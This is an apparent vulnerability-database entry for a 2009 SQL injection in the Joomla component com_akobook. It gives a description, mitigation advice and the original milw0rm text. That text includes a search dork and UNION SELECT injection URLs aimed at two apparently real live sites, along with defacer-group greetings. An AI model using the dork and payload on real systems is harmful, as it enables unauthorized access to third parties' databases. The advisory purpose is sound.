Vendor: AkoBook
Submitted by: Ab1i
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: AkoBook
Affected Version From: SE 2.3
Affected Version To: SE 2.3
Patch Exists: NO
Related CWE: N/A
CPE: a:saddo:akobook
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Joomla Component com_akobook Vulnerability

A SQL injection vulnerability in the Joomla component com_akobook (AkoBook SE 2.3) allows a remote attacker to inject arbitrary SQL into the back-end query. The 'gbid' parameter of 'index.php' (option=com_akobook&func=sign&action=reply) is placed into the SQL statement without being validated or cast to an integer, so a crafted HTTP request such as gbid=-1 UNION SELECT ... /* (the demo links below use a 19-column UNION, the count needed to match the vulnerable query on those installs, and a trailing comment opener to discard the remainder of the statement) makes the database return attacker-chosen values and columns from other tables. Successful exploitation could disclose sensitive information from the database or allow further SQL to be executed with the application's database privileges.

Mitigation:

Cast 'gbid' to an integer (or bind it as a prepared-statement parameter) and reject any non-numeric value before it reaches the query; generic string sanitization is not enough for a numeric parameter. No patch is listed for SE 2.3, so site owners should remove or replace the component, or block requests at the web server or WAF where gbid is not purely numeric.

Exploit-DB raw data:

Joomla Component com_akobook Vulnerability
----------------------------------------------------------------------
 ###################################################
 [+] Author        :  Ab1i
 [+] Email         :  ab1i_usta@hotmail.com
 [+] Dork  : inurl:index.php?option=com_akobook
 ###################################################
________________________________________________________
Example:
http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )

Demo Live (1):
http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Demo Live (2):
http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
++++++++++++++++++++++++++++++++++++++++++++++++++
www.ayyildiz.org
A Turk has no friend but a Turk. You too, support Turkish sites ....
Turkish Defacers Ab1i
Eno7 , The_Bekir , Bgh7 , m0sted , Beygazi . Greetings to the masters :)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<name>AkoBook</name>
<creationDate>09.04.2006</creationDate>
<author>Melikyan Sergey aka SaD</author>
<copyright> This component is released under the GNU/GPL License.  </copyright>
<authorEmail>contact@saddo.ru</authorEmail>
<authorUrl>http://saddo.ru/</authorUrl>
<version>SE 2.3</version>

# milw0rm.com [2009-06-09]